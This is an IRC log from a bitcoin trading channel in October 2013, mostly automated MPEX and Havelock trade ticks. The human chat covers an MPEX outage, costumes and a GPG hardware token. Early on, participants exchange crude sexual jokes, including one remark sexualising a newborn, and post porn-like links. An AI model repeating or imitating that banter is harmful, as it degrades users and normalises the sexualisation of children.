20:43:04 <zoinky> exactly Oct 26 20:43:13 <mircea_popescu> dexX7 that' Oct 26 20:43:20 <mircea_popescu> s as of the time of filing, and they're unlimited. Oct 26 20:43:22 <zoinky> helps break through to larger more traditional financial areas Oct 26 20:43:27 <jurov> Mpex still not working? Oct 26 20:43:34 <mircea_popescu> jurov working on it. Oct 26 20:43:48 <mircea_popescu> if you have an emergency pm Oct 26 20:44:32 <dexX7> "failing last since 2011" should be corrected then, i guess :p Oct 26 20:44:43 <assbot> [MPEX] [S.MPOE] 5005 @ 0.00080528 = 4.0304 BTC [+] Oct 26 20:45:01 <kakobrekla> hey i have an emergency Oct 26 20:45:07 <kakobrekla> im out of milk. Oct 26 20:46:51 <jurov> No emergency, just am away for whole day, getting alerts, wondering wtf is happening. Oct 26 20:47:33 <jurov> Ok, checking off, later. Oct 26 20:50:08 <mircea_popescu> dexX7 haven't quite failed yet tyvm Oct 26 20:50:40 <mircea_popescu> kakobrekla http://www.peopleamazeme.com/wp-content/uploads/2011/06/PeopleAmazeMe_com-milk-sexy-babe-woman-oreo-hot-wet.jpg Oct 26 20:50:47 <mircea_popescu> just for you. i think she's slovenian. Oct 26 20:51:56 <kakobrekla> maybe, dirty enough, thats for sure. Oct 26 20:55:28 <mircea_popescu> lol Oct 26 21:08:05 <assbot> [HAVELOCK] [AM1] 4 @ 0.81 = 3.24 BTC [+] Oct 26 21:12:28 <VanCleef> anyone into giving birth porn? Oct 26 21:14:18 <mircea_popescu> that's porn !? Oct 26 21:15:28 <asciilifeform> VanCleef: how's that work? 'see this astounding reverse penetration!' ? Oct 26 21:15:40 <pankkake> you're surprised something is porn? Oct 26 21:16:02 <VanCleef> a woman gives birth, and a guy comes in and does her Oct 26 21:16:13 <asciilifeform> VanCleef: before? after? during? Oct 26 21:16:19 <VanCleef> some real underground german shit Oct 26 21:16:37 <pankkake> or fuck the baby and the mom! Oct 26 21:16:39 <mircea_popescu> ow. Oct 26 21:17:20 <mircea_popescu> today on tap, "postpartum and parenteral gangbang, dual penetration and bukkakke. come one, come all!" Oct 26 21:18:00 <pankkake> http://headfucking.net/headfucking.mpg btw Oct 26 21:21:19 <assbot> [MPEX] [S.MPOE] 3539 @ 0.00080483 = 2.8483 BTC [-] {2} Oct 26 21:25:23 <assbot> [HAVELOCK] [AM1] 1 @ 0.81 BTC [+] Oct 26 21:44:42 <assbot> [HAVELOCK] [AM100] 25 @ 0.0079 = 0.1975 BTC [+] Oct 26 21:45:17 <nubbins`> hi Oct 26 21:47:45 <assbot> [HAVELOCK] [AM100] 58 @ 0.008 = 0.464 BTC [+] Oct 26 21:50:48 <assbot> [MPEX] [S.MPOE] 8242 @ 0.00080087 = 6.6008 BTC [-] {2} Oct 26 21:55:48 <nubbins`> http://imgur.com/hR77muQ Oct 26 21:55:49 <ozbot> imgur: the simple image sharer Oct 26 21:55:54 <nubbins`> all ready for halloween :0 Oct 26 21:56:50 <mircea_popescu> you look like a dork Oct 26 21:58:07 <nubbins`> yep Oct 26 21:58:11 <nubbins`> pascale's is way cooler Oct 26 21:58:20 <nubbins`> http://imgur.com/LuwYXfs Oct 26 21:58:20 <ozbot> imgur: the simple image sharer Oct 26 22:00:05 <mircea_popescu> ha! Oct 26 22:00:13 <mircea_popescu> pretty cool. who's that ? Oct 26 22:00:29 <nubbins`> just some random 70's cop Oct 26 22:00:32 <mircea_popescu> ah Oct 26 22:00:39 <nubbins`> she was going for a beastie boys "sabotage" kinda look Oct 26 22:00:53 <mircea_popescu> yeah, even the tie. Oct 26 22:02:08 <nubbins`> little bit less obscure than last year's costume of the 2 characters from a short film "umshini wam" Oct 26 22:02:18 <nubbins`> which, if you're into odd things, is worth watching Oct 26 22:03:04 <nubbins`> (http://www.wefearchange.com/wp-content/uploads/dieharmony.jpg) Oct 26 22:04:01 <assbot> [HAVELOCK] [AM1] 2 @ 0.85 = 1.7 BTC [+] Oct 26 22:19:16 <assbot> [HAVELOCK] [AM1] 19 @ 0.86945156 = 16.5196 BTC [+] {5} Oct 26 22:22:19 <assbot> [HAVELOCK] [NEOBEE] 5457 @ 0.00227336 = 12.4057 BTC [-] {22} Oct 26 22:23:20 <assbot> [HAVELOCK] [NEOBEE] 2135 @ 0.002 = 4.27 BTC [-] {2} Oct 26 22:24:21 <assbot> [HAVELOCK] [AM1] 2 @ 0.81100001 = 1.622 BTC [-] Oct 26 22:29:26 <assbot> [HAVELOCK] [AM1] 21 @ 0.82 = 17.22 BTC [+] Oct 26 22:41:38 <assbot> [HAVELOCK] [NEOBEE] 1000 @ 0.00273609 = 2.7361 BTC [+] {5} Oct 26 22:43:01 <jurov> .bait Oct 26 22:43:02 <ozbot> http://24.media.tumblr.com/51afc7dbdbb57beacbbb88d88c0a8a84/tumblr_msthjhyh961rhwe3do1_400.gif Oct 26 22:43:23 <jurov> dat Oct 26 22:46:43 <assbot> [HAVELOCK] [AM1] 20 @ 0.85 = 17 BTC [+] Oct 26 22:47:44 <assbot> [HAVELOCK] [AM1] 9 @ 0.87499999 = 7.875 BTC [+] {2} Oct 26 22:47:55 <pankkake> nice Oct 26 22:48:38 <KRS1> Something told me to come over here and click that Oct 26 22:48:45 <assbot> [HAVELOCK] [AM1] 6 @ 0.875 = 5.25 BTC [+] {2} Oct 26 22:49:32 <KRS1> nubbins: oh shit ZEF style Oct 26 22:52:10 <turbo_ac100_> dieharmony.jpg That's Die Antwoord https://www.youtube.com/watch?v=4_pS46YRMIQ I didn't know there is a movie! Oct 26 22:52:15 <KRS1> My fav song/video they did is BABY'S ON FIRE. Fatty Boom Boom aint bad either Oct 26 22:53:54 <KRS1> he's good at BEAT BOX Oct 26 22:55:05 <KRS1> something is just...off...with that girl..idk wtf it is though. Oct 26 22:56:17 <turbo_ac100_> lol https://www.youtube.com/watch?feature=player_detailpage&v=f1KbfFdUTQ4#t=121 "If you don't like funerals don't kick sand into a ninjas' face" Oct 26 23:04:00 <assbot> [HAVELOCK] [NEOBEE] 63 @ 0.00273898 = 0.1726 BTC [+] {2} Oct 26 23:11:07 <assbot> [HAVELOCK] [B] [XBOND] 144 @ 0.00114785 = 0.1653 BTC [-] Oct 26 23:21:12 <dexX7> https://bitcointalk.org/index.php?topic=312830.msg3417014#msg3417014 Oct 26 23:21:14 <ozbot> [CRYPTOSTOCKS] Labcoin Official Thread - Self-Moderated Oct 26 23:24:20 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.00273896 = 0.2739 BTC [+] Oct 26 23:25:21 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114799 = 0.1148 BTC [+] Oct 26 23:29:25 <assbot> [HAVELOCK] [AM1] 1 @ 0.85 BTC [-] Oct 26 23:29:26 <assbot> [HAVELOCK] [AM100] 40 @ 0.00770005 = 0.308 BTC [-] Oct 26 23:31:27 <assbot> [HAVELOCK] [AM1] 2 @ 0.85 = 1.7 BTC [-] Oct 26 23:33:38 <pankkake> http://c4ss.org/content/22005 Oct 26 23:33:39 <ozbot> Center for a Stateless Society » Internet Security Is Our Responsibility Oct 26 23:35:31 <assbot> [HAVELOCK] [AM100] 65 @ 0.0082 = 0.533 BTC [+] Oct 26 23:46:42 <assbot> [HAVELOCK] [NEOBEE] 200 @ 0.002555 = 0.511 BTC [-] Oct 26 23:51:47 <assbot> [HAVELOCK] [HIM] 2 @ 0.07459999 = 0.1492 BTC [-] Oct 26 23:56:52 <assbot> [HAVELOCK] [AM1] 1 @ 0.8301 BTC [-] Oct 26 23:57:53 <assbot> [HAVELOCK] [AM100] 465 @ 0.00770001 = 3.5805 BTC [-] {3} Oct 26 23:58:55 <assbot> [HAVELOCK] [AM1] 1 @ 0.88 BTC [+] Oct 27 00:13:08 <assbot> [HAVELOCK] [AM1] 1 @ 0.88 BTC [+] Oct 27 00:28:23 <assbot> [HAVELOCK] [AM1] 2 @ 0.88 = 1.76 BTC [+] Oct 27 00:29:25 <assbot> [HAVELOCK] [HIM] 8 @ 0.0746 = 0.5968 BTC [+] Oct 27 00:30:25 <assbot> [HAVELOCK] [AM1] 3 @ 0.88898998 = 2.667 BTC [+] Oct 27 00:33:28 <assbot> [HAVELOCK] [B] [XBOND] 1000 @ 0.00114799 = 1.148 BTC [+] Oct 27 00:34:29 <assbot> [HAVELOCK] [B] [XBOND] 1000 @ 0.00114799 = 1.148 BTC [+] Oct 27 00:34:30 <assbot> [HAVELOCK] [HIM] 2 @ 0.0746 = 0.1492 BTC [+] Oct 27 00:34:31 <assbot> [HAVELOCK] [VTX] 1 @ 0.33999999 BTC [+] Oct 27 00:34:32 <assbot> [HAVELOCK] [AM1] 3 @ 0.88899 = 2.667 BTC [+] Oct 27 00:34:33 <assbot> [HAVELOCK] [AM100] 140 @ 0.0082 = 1.148 BTC [+] Oct 27 00:35:30 <assbot> [HAVELOCK] [VTX] 4 @ 0.33999999 = 1.36 BTC [+] Oct 27 00:35:31 <assbot> [HAVELOCK] [NEOBEE] 293 @ 0.00273893 = 0.8025 BTC [+] Oct 27 00:37:32 <assbot> [HAVELOCK] [AM1] 1 @ 0.88899 BTC [+] Oct 27 00:38:34 <assbot> [HAVELOCK] [AM1] 2 @ 0.89000001 = 1.78 BTC [+] Oct 27 00:39:34 <assbot> [HAVELOCK] [AM100] 300 @ 0.00842577 = 2.5277 BTC [+] {5} Oct 27 00:41:36 <assbot> [HAVELOCK] [AM1] 1 @ 0.89 BTC [-] Oct 27 00:53:48 <assbot> [HAVELOCK] [B] [XBOND] 2000 @ 0.00114799 = 2.296 BTC [+] {2} Oct 27 00:58:53 <assbot> [HAVELOCK] [B] [XBOND] 871 @ 0.00114799 = 0.9999 BTC [+] Oct 27 00:58:54 <assbot> [HAVELOCK] [AM100] 87 @ 0.00845 = 0.7352 BTC [+] Oct 27 01:03:58 <assbot> [HAVELOCK] [AM100] 100 @ 0.00853046 = 0.853 BTC [+] {4} Oct 27 01:11:05 <assbot> [MPEX] [TEST] 987654321 @ 1.23456789 = 1219326311.1264 BTC Oct 27 01:12:39 <dexX7> x_x Oct 27 01:16:10 <mircea_popescu> infinite monyz Oct 27 01:20:14 <assbot> [HAVELOCK] [NEOBEE] 200 @ 0.00273895 = 0.5478 BTC [+] Oct 27 01:28:22 <assbot> [HAVELOCK] [B] [XBOND] 108 @ 0.00114785 = 0.124 BTC [-] Oct 27 01:28:46 <jurov> the TEST is not in rss Oct 27 01:29:16 <mircea_popescu> it wouldn't be, it just tests assbot. Oct 27 01:30:12 <jurov> will be any change required, or can i go afk? Oct 27 01:30:40 <mircea_popescu> jurov nah, go relax, by the time you're back everything should be fine. Oct 27 01:31:05 <jurov> *thumbs up* Oct 27 01:52:46 <assbot> [HAVELOCK] [AM100] 40 @ 0.00826198 = 0.3305 BTC [-] {3} Oct 27 01:55:50 <assbot> [HAVELOCK] [NEOBEE] 295 @ 0.00273865 = 0.8079 BTC [-] {2} Oct 27 02:10:33 <skinnkavaj> (01:05:58)  -› Quit: virtuals_mr (~virtuals_@85-156-3-230.elisa-mobile.fi) (Quit: labcoin shares best xmas present ever get them at cryptostocks.com) Oct 27 02:10:33 <skinnkavaj> xD Oct 27 02:13:06 <assbot> [HAVELOCK] [CFIG] 1 @ 0.177 BTC [-] Oct 27 02:14:07 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114784 = 0.1148 BTC [-] Oct 27 02:21:14 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.0011478 = 0.1148 BTC [-] Oct 27 02:22:15 <assbot> [HAVELOCK] [AM1] 14 @ 0.97339285 = 13.6275 BTC [+] {5} Oct 27 02:25:18 <assbot> [HAVELOCK] [AM100] 25 @ 0.00854998 = 0.2137 BTC [+] {2} Oct 27 02:27:20 <assbot> [HAVELOCK] [AM100] 79 @ 0.00854998 = 0.6754 BTC [+] {3} Oct 27 02:28:22 <assbot> [HAVELOCK] [CBTC] 1000 @ 0.000168 = 0.168 BTC [+] Oct 27 02:29:22 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.0027 = 0.27 BTC [-] Oct 27 02:31:24 <assbot> [HAVELOCK] [HIM] 4 @ 0.0746999 = 0.2988 BTC [+] Oct 27 02:32:25 <assbot> [HAVELOCK] [B] [XBOND] 89 @ 0.00114784 = 0.1022 BTC [+] Oct 27 02:37:30 <assbot> [HAVELOCK] [AM1] 2 @ 0.995 = 1.99 BTC [+] {2} Oct 27 02:39:32 <assbot> [HAVELOCK] [AM1] 1 @ 1 BTC [+] Oct 27 02:40:33 <assbot> [HAVELOCK] [AM1] 1 @ 1.06 BTC [+] Oct 27 02:44:37 <assbot> [HAVELOCK] [AM1] 2 @ 0.93000006 = 1.86 BTC [-] Oct 27 02:50:43 <assbot> [HAVELOCK] [AM1] 8 @ 0.938775 = 7.5102 BTC [+] {5} Oct 27 02:51:44 <assbot> [HAVELOCK] [AM1] 3 @ 0.93 = 2.79 BTC [-] Oct 27 02:53:48 <mircea_popescu> http://www.xach.com/naggum/articles/3129759496251093@naggum.no.html Oct 27 02:53:49 <ozbot> Re: A draft business plan for free software LISP vendors - Naggum cll archive Oct 27 03:03:56 <assbot> [HAVELOCK] [AM100] 200 @ 0.00887544 = 1.7751 BTC [+] {5} Oct 27 03:34:27 <assbot> [HAVELOCK] [B] [XBOND] 203 @ 0.00114784 = 0.233 BTC [+] Oct 27 03:45:38 <assbot> [HAVELOCK] [AM100] 200 @ 0.00888797 = 1.7776 BTC [+] {2} Oct 27 03:47:39 <assbot> [HAVELOCK] [CFIG] 4 @ 0.177 = 0.708 BTC [-] Oct 27 03:59:51 <assbot> [HAVELOCK] [AM1] 5 @ 0.93 = 4.65 BTC [-] Oct 27 03:01:42 <thestringpuller> kakobrekla: why is bitcoin-assets.com down? Oct 27 03:01:50 <thestringpuller> nvm Oct 27 03:14:05 <assbot> [HAVELOCK] [AM1] 20 @ 0.9221 = 18.442 BTC [-] {4} Oct 27 03:16:07 <assbot> [HAVELOCK] [AM1] 4 @ 0.92 = 3.68 BTC [-] {3} Oct 27 03:17:08 <assbot> [HAVELOCK] [CFIG] 1 @ 0.177 BTC [-] Oct 27 03:25:16 <assbot> [HAVELOCK] [NEOBEE] 446 @ 0.00273996 = 1.222 BTC [+] Oct 27 03:35:00 <KRS1> you could always join #bitcoin-ass Oct 27 03:38:38 <thestringpuller> ;;seen mod6 Oct 27 03:38:38 <gribble> mod6 was last seen in #bitcoin-assets 14 hours, 55 minutes, and 37 seconds ago: <mod6> ok Oct 27 03:44:35 <assbot> [HAVELOCK] [AM1] 5 @ 0.91 = 4.55 BTC [-] {3} Oct 27 03:48:40 <assbot> [HAVELOCK] [AM1] 3 @ 0.91 = 2.73 BTC [-] Oct 27 04:26:17 <assbot> [HAVELOCK] [AM1] 1 @ 0.901 BTC [-] Oct 27 04:31:18 <mod6> werd up Oct 27 04:32:24 <mod6> watcha been up to thestringpuller? Oct 27 04:37:27 <assbot> [HAVELOCK] [HIM] 5 @ 0.0747 = 0.3735 BTC [+] Oct 27 04:40:30 <assbot> [HAVELOCK] [B] [XBOND] 672 @ 0.00114 = 0.7661 BTC [+] Oct 27 04:45:35 <assbot> [HAVELOCK] [HIM] 16 @ 0.07499974 = 1.2 BTC [+] {2} Oct 27 05:12:01 <assbot> [HAVELOCK] [AM100] 51 @ 0.008877 = 0.4527 BTC [-] Oct 27 05:50:40 <assbot> [HAVELOCK] [AM1] 1 @ 0.92 BTC [+] Oct 27 05:54:44 <assbot> [HAVELOCK] [CFIG] 1 @ 0.177 BTC [-] Oct 27 05:56:46 <assbot> [HAVELOCK] [HIM] 4 @ 0.075 = 0.3 BTC [+] Oct 27 05:57:47 <assbot> [HAVELOCK] [B] [XBOND] 375 @ 0.00114 = 0.4275 BTC [+] Oct 27 06:13:02 <assbot> [HAVELOCK] [AM1] 1 @ 0.92024 BTC [+] Oct 27 06:14:03 <assbot> [HAVELOCK] [AM1] 1 @ 0.91 BTC [-] Oct 27 06:16:05 <assbot> [HAVELOCK] [AM1] 5 @ 0.9 = 4.5 BTC [-] {2} Oct 27 06:18:07 <assbot> [HAVELOCK] [B] [XBOND] 3800 @ 0.00114 = 4.332 BTC [+] {2} Oct 27 06:18:09 <assbot> [HAVELOCK] [HIM] 5 @ 0.075 = 0.375 BTC [+] Oct 27 06:19:07 <assbot> [HAVELOCK] [AM100] 42 @ 0.00830003 = 0.3486 BTC [-] {2} Oct 27 06:20:08 <assbot> [HAVELOCK] [AM100] 162 @ 0.0082753 = 1.3406 BTC [-] {3} Oct 27 06:21:09 <assbot> [HAVELOCK] [AM100] 28 @ 0.00824578 = 0.2309 BTC [-] {3} Oct 27 06:22:10 <assbot> [HAVELOCK] [AM100] 30 @ 0.008199 = 0.246 BTC [-] Oct 27 06:25:13 <assbot> [HAVELOCK] [AM100] 65 @ 0.008199 = 0.5329 BTC [-] **** BEGIN LOGGING AT Sun Oct 27 15:13:30 2013 Oct 27 15:16:57 <assbot> [HAVELOCK] [AM1] 1 @ 0.94999999 BTC [-] Oct 27 15:16:58 <assbot> [HAVELOCK] [DEALCO] 16 @ 0.00779 = 0.1246 BTC [-] Oct 27 15:17:57 <assbot> [HAVELOCK] [DEALCO] 69 @ 0.0077999 = 0.5382 BTC [+] {2} Oct 27 15:19:00 <assbot> [HAVELOCK] [NEOBEE] 75 @ 0.00273388 = 0.205 BTC [-] Oct 27 15:19:59 <assbot> [HAVELOCK] [AM100] 17 @ 0.00878 = 0.1493 BTC [+] {2} Oct 27 15:21:00 <assbot> [HAVELOCK] [CFIG] 3 @ 0.177 = 0.531 BTC [-] Oct 27 15:22:01 <assbot> [HAVELOCK] [CFIG] 2 @ 0.178 = 0.356 BTC [+] Oct 27 15:24:03 <assbot> [HAVELOCK] [HIM] 3 @ 0.075 = 0.225 BTC [+] Oct 27 15:42:21 <assbot> [HAVELOCK] [AM100] 38 @ 0.00878 = 0.3336 BTC [-] Oct 27 15:42:22 <assbot> [HAVELOCK] [AM1] 1 @ 0.901 BTC [-] Oct 27 15:43:22 <assbot> [HAVELOCK] [B] [XBOND] 98 @ 0.0011121 = 0.109 BTC [-] Oct 27 15:57:36 <assbot> [HAVELOCK] [AM1] 3 @ 0.85373334 = 2.5612 BTC [-] {2} Oct 27 16:08:46 <assbot> [HAVELOCK] [AM1] 24 @ 0.851925 = 20.4462 BTC [-] {3} Oct 27 16:13:51 <assbot> [HAVELOCK] [AM1] 10 @ 0.82651099 = 8.2651 BTC [-] {5} Oct 27 16:14:52 <assbot> [HAVELOCK] [AM1] 10 @ 0.800003 = 8 BTC [-] {2} Oct 27 16:15:53 <assbot> [HAVELOCK] [AM1] 7 @ 0.8 = 5.6 BTC [-] {2} Oct 27 16:16:54 <assbot> [HAVELOCK] [AM1] 7 @ 0.80001 = 5.6001 BTC [+] Oct 27 16:18:56 <assbot> [HAVELOCK] [CFIG] 3 @ 0.1775 = 0.5325 BTC [-] Oct 27 16:31:31 <FabianB_> yay, mpex stat works again :D Oct 27 16:32:16 <ThickAsThieves> sweet Oct 27 16:38:27 <mircea_popescu> sorry for teh delay. the problem with this sort of shit is once the slightest not-working-as-expected thing pops swaths of things have to now be checked Oct 27 16:38:43 <mircea_popescu> even if you know why and what happened, or at any rate think so. Oct 27 16:41:06 <FabianB_> np for ppl here having some kind of updates i guess Oct 27 16:41:42 <mircea_popescu> to be honest irc is the best news channel i've ever seen Oct 27 16:41:55 <FabianB_> wondering how users not hanging around here see things Oct 27 16:42:07 <FabianB_> indeed, irc has always been best Oct 27 16:42:08 <mircea_popescu> well... inasmuch as not hanging around is a choice... Oct 27 16:42:38 <mircea_popescu> i would imagine they see them in the log or don't care or something tailored to personal taste Oct 27 16:43:42 <FabianB_> yeah, i wouldn't trade on mpex without being here or checking logs once in a while Oct 27 16:44:35 <mircea_popescu> anyway, it wasn't an attack of any sort or even related to outside influence. it was a problem stemming from the too stringent checking imposed on proxy synchronization after the last adventure, which in an edge case put everything in a paranoid state. Oct 27 16:45:00 <mircea_popescu> shouldn't happen again, at least not in exactly the same way. Oct 27 16:45:27 <FabianB_> mircea_popescu: can you disclose info on whether there was one (or 1% of users) that could still trade? Oct 27 16:45:48 <mircea_popescu> anyone had a maybe 1 in >1k tries chance to trade Oct 27 16:46:02 <mircea_popescu> kinda hard to calculate the >1k exactly Oct 27 16:46:25 <FabianB_> ah, that's y, so probably bots that tried continueously made those rare trades Oct 27 16:47:26 <mircea_popescu> i think so Oct 27 16:47:51 <ThickAsThieves> so it wasnt the fake volume bot? Oct 27 16:47:53 <mircea_popescu> ironically, actual orders had somewhat better chances to get through than stats i think Oct 27 16:47:55 <ThickAsThieves> ;) Oct 27 16:48:20 <mircea_popescu> ThickAsThieves or that, yeah. Oct 27 16:48:20 <FabianB_> heh Oct 27 16:51:40 <FabianB_> it's more of a depth bot, not volume, isn't it? Oct 27 16:53:34 <mircea_popescu> o, mpoe bot has a different interface to the trade engine, it can't be affected by this stuff Oct 27 16:56:33 <assbot> [HAVELOCK] [HIM] 10 @ 0.075 = 0.75 BTC [+] Oct 27 17:00:49 <FabianB_> i think ThickAsThieves didn't mean mpoe bot, since it doesn't trade s.mpoe, does it? Oct 27 17:02:48 <kakobrekla> tat ment the fake vol bot Oct 27 17:02:52 <kakobrekla> code stolen from btctc Oct 27 17:10:15 <ThickAsThieves> mp is just saying yeah, the btct-tm-fake-volume-bot does indeed have special access to trade Oct 27 17:17:54 <assbot> [HAVELOCK] [VTX] 1 @ 0.32 BTC [-] Oct 27 17:27:03 <assbot> [HAVELOCK] [AM100] 108 @ 0.00788189 = 0.8512 BTC [-] {4} Oct 27 17:28:04 <assbot> [HAVELOCK] [AM100] 56 @ 0.007881 = 0.4413 BTC [-] {2} Oct 27 17:32:44 <mircea_popescu> wait wut Oct 27 17:33:26 <ThickAsThieves> hehe Oct 27 17:36:12 <assbot> [MPEX] [S.MPOE] 2500 @ 0.00081211 = 2.0303 BTC [+] Oct 27 17:39:15 <assbot> [MPEX] [S.MPOE] 4632 @ 0.0008123 = 3.7626 BTC [+] Oct 27 17:41:40 <KRS1> ;;sell 398.98 Oct 27 17:41:41 <gribble> (sell <amount> <thing> [at|@] <priceperunit> <otherthing> [<notes>]) -- Logs a sell order for <amount> units of <thing, at a price of <price> per unit, in units of <otherthing>. Use the optional <notes> field to put in any special notes. <price> may include an arithmetical expression, and {(mtgox|bitstamp)(ask|bid|last|high|low|avg)} to index price to mtgox ask, bid, last, high, low, or avg (1 more message) Oct 27 17:41:49 <KRS1> ;;sell 398.98 @ 178 Oct 27 17:41:50 <gribble> (sell <amount> <thing> [at|@] <priceperunit> <otherthing> [<notes>]) -- Logs a sell order for <amount> units of <thing, at a price of <price> per unit, in units of <otherthing>. Use the optional <notes> field to put in any special notes. <price> may include an arithmetical expression, and {(mtgox|bitstamp)(ask|bid|last|high|low|avg)} to index price to mtgox ask, bid, last, high, low, or avg (1 more message) Oct 27 17:43:33 <KRS1> ;;market sell 398.98 Oct 27 17:43:34 <gribble> A market order to sell 398.98 bitcoins right now would net 77128.6747 USD and would take the last price down to 192.2200 USD, resulting in an average price of 193.3146 USD/BTC. | Data vintage: 0.0001 seconds Oct 27 17:56:54 <jurov> lmao <ThickAsThieves> [15:10:16] mp is just saying yeah, the btct-tm-fake-volume-bot does indeed have special access to trade Oct 27 17:59:04 <jurov> ;;bc,stats Oct 27 17:59:06 <gribble> Current Blocks: 266390 | Current Difficulty: 3.9092878763808584E8 | Next Difficulty At Block: 268127 | Next Difficulty In: 1737 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 13 minutes, and 1 second | Next Difficulty Estimate: 483913456.849 | Estimated Percent Change: 23.78558 Oct 27 18:05:16 <mircea_popescu> still over 20% Oct 27 18:17:52 <assbot> [HAVELOCK] [AM100] 100 @ 0.0084999 = 0.85 BTC [+] {3} Oct 27 18:21:56 <assbot> [HAVELOCK] [AM100] 413 @ 0.00810267 = 3.3464 BTC [-] {7} Oct 27 18:22:57 <assbot> [HAVELOCK] [AM100] 48 @ 0.0081 = 0.3888 BTC [-] Oct 27 18:26:00 <assbot> [HAVELOCK] [AM100] 52 @ 0.00800001 = 0.416 BTC [-] Oct 27 18:27:01 <assbot> [HAVELOCK] [AM100] 97 @ 0.008 = 0.776 BTC [-] {2} Oct 27 18:29:03 <assbot> [HAVELOCK] [AM100] 57 @ 0.008 = 0.456 BTC [-] Oct 27 18:33:21 <dexX7> mircea_popescu: probably too soon to ask, but is there any eta for the nsa/gpg token? Oct 27 18:36:10 <assbot> [HAVELOCK] [AM1] 4 @ 0.86999999 = 3.48 BTC [+] {2} Oct 27 18:37:11 <assbot> [HAVELOCK] [AM1] 24 @ 0.87187498 = 20.925 BTC [+] {6} Oct 27 18:38:13 <assbot> [HAVELOCK] [AM1] 3 @ 0.87 = 2.61 BTC [-] Oct 27 18:43:56 <darby> hi Oct 27 18:44:10 <KRS1> hi Oct 27 18:46:18 <kakobrekla> hi Oct 27 18:46:21 <assbot> [HAVELOCK] [AM100] 535 @ 0.00829993 = 4.4405 BTC [+] {5} Oct 27 18:46:40 <jurov> he Oct 27 18:46:50 <kakobrekla> ccccombo breaker. Oct 27 18:47:02 <darby> kakobrekla sent me here Oct 27 18:47:13 <kakobrekla> he did? Oct 27 18:47:22 <assbot> [HAVELOCK] [AM100] 52 @ 0.0083 = 0.4316 BTC [+] {2} Oct 27 18:47:36 <kakobrekla> what an outrage. Oct 27 18:47:45 <darby> indeed Oct 27 18:48:11 <kakobrekla> o, you must be the guy from donna forum? Oct 27 18:48:23 <assbot> [HAVELOCK] [AM100] 87 @ 0.0083 = 0.7221 BTC [+] Oct 27 18:48:30 <darby> the ONLY professional BC chan :) Oct 27 18:48:46 <kakobrekla> well what, its true, sadly Oct 27 18:49:24 <assbot> [HAVELOCK] [AM100] 27 @ 0.008433 = 0.2277 BTC [+] Oct 27 18:49:33 <kakobrekla> if anything relevant is happening in btc finance Oct 27 18:49:38 <kakobrekla> you will prolly find it here Oct 27 18:50:15 <darby> a lot more people than i would've expected Oct 27 18:50:54 <darby> dyu guys actively trade or just follow the market Oct 27 18:50:57 <kakobrekla> well theres even more people in #bitcoin-otc Oct 27 18:50:58 <ThickAsThieves> the smart ones dont say anything Oct 27 18:51:02 <kakobrekla> which is over the counter irc chan Oct 27 18:51:12 <kakobrekla> but most of people here cant stand it there Oct 27 18:51:14 <kakobrekla> including me Oct 27 18:51:40 <jurov> yea, we are all scammers and slanderous solus Oct 27 18:51:41 <kakobrekla> cause its just a bunch of newbs trading 5$ worth back and forward Oct 27 18:51:42 <jurov> *souls Oct 27 18:51:47 <kakobrekla> lol fu jurov. Oct 27 18:52:03 <darby> i see Oct 27 18:52:26 <kakobrekla> ThickAsThieves, this is not the case here though. Oct 27 18:52:27 <assbot> [HAVELOCK] [VTX] 7 @ 0.31392857 = 2.1975 BTC [-] {3} Oct 27 18:52:55 <mircea_popescu> dexX7 not too soon, the target still is before xmas Oct 27 18:53:00 <mircea_popescu> so ppl can give ppl cryptolove Oct 27 18:53:11 <dexX7> well, before xmas is pretty soon imho Oct 27 18:53:39 <mircea_popescu> imho too. Oct 27 18:53:48 <mircea_popescu> but what else are engineers for, if not whipping and abuse ? Oct 27 18:53:49 <jurov> will cardano include a kit for hiding it in body cavities? Oct 27 18:54:19 <mircea_popescu> jurov i think the only body cavity able to hide it would be a well worked vagina, the sort pankkake favours Oct 27 18:54:43 <pankkake> I prefer mouths personally Oct 27 18:54:45 <jurov> so i should get a gf to be able to hide it securely? Oct 27 18:54:47 <kakobrekla> anywho, darby, make yourself cosy, bring some cookies and lurk around is my suggestion, you can also go through the log if you are borred Oct 27 18:55:08 <darby> ty Oct 27 18:55:23 <mircea_popescu> jurov seriously, atm the form factor is roughly the size of a smartphone Oct 27 18:55:52 <kakobrekla> darby, ill be back in ~30min if you want to talk about anything specific. Oct 27 18:55:55 <kakobrekla> later Oct 27 18:56:37 <darby> cu Oct 27 18:57:39 <jurov> well, that gives me a pause... iirc it is not supposed to house very valuable gpg keys such as mpex accts, cuz no backup and it's too easy to erase Oct 27 18:58:22 <jurov> but half a smartphone isn't very convenient to keep on myself all the time (for disposable communication-related keys and protection from unauthorized use) Oct 27 19:01:36 <assbot> [HAVELOCK] [AM100] 38 @ 0.00801578 = 0.3046 BTC [-] {3} Oct 27 19:04:18 <mircea_popescu> http://trilema.com/2013/badbios-aka-badlydonedamagecontrol/ Oct 27 19:04:18 <ozbot> #BadBios, aka #BadlyDoneDamageControl pe Trilema - Un blog de Mircea Popescu. Oct 27 19:04:53 <mircea_popescu> jurov when this prototyping started it was the size of a breadbox Oct 27 19:11:44 <pankkake> #TooMuchHashtags Oct 27 19:12:47 <assbot> [HAVELOCK] [CBTC] 1314 @ 0.00015003 = 0.1971 BTC [-] {4} Oct 27 19:12:47 <mike_c> just keep it in your purse jurov Oct 27 19:14:29 <pankkake> a man purse Oct 27 19:15:01 <pankkake> it's european! Oct 27 19:16:21 <mike_c> hehe. metrosexual is as fashionable as gpg. Oct 27 19:18:13 <jurov> hey, it's waterproof and with tinfoil added! Oct 27 19:20:57 <jurov> in short, i hope cardano becomes inconspicuous neck-wearable gizmo in next incarnation Oct 27 19:22:41 <mircea_popescu> lol Oct 27 19:22:53 <mircea_popescu> jurov make sure it contains a vaporiser Oct 27 19:22:57 <mircea_popescu> for to sauna the cardano Oct 27 19:29:52 <kakobrekla> more for memory imparment program on the cardano Oct 27 19:32:44 <kakobrekla> also, knock knock: http://d24w6bsrhbeh9d.cloudfront.net/photo/ab5rNA9_460sa.gif Oct 27 19:33:11 <Kleeck_> whoa. Oct 27 19:33:28 <Kleeck_> whoa constrictor. Oct 27 19:33:58 <mircea_popescu> ahahahah Oct 27 19:53:11 <mike_c> mpex sysadmins are having a bad week. Oct 27 19:56:41 <jurov> mircea_popescu: seems down 